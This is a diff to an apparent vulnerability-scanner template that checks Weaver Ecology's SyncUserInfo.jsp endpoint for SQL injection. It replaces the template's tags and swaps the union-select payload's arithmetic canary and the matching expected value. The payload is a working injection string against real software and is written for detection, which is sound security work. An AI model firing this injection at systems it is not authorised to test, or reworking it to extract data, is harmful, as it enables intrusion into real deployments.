--- a/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml
+++ b/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml
@@ -5,12 +5,12 @@ info:
   severity: high
   reference:
     - https://www.weaver.com.cn/
-  tags: ecology,syncuserinfo,seasql
+  tags: ecology,sqli
   
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(1520*1520),null"
+      - "{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null"
 
     redirects: true
     max-redirects: 2   
@@ -18,9 +18,9 @@ requests:
     matchers:
 
       - type: word
-        words:
-          - "2310400"
         part: body
+        words:
+          - "4386499557"
 
       - type: status
         status:
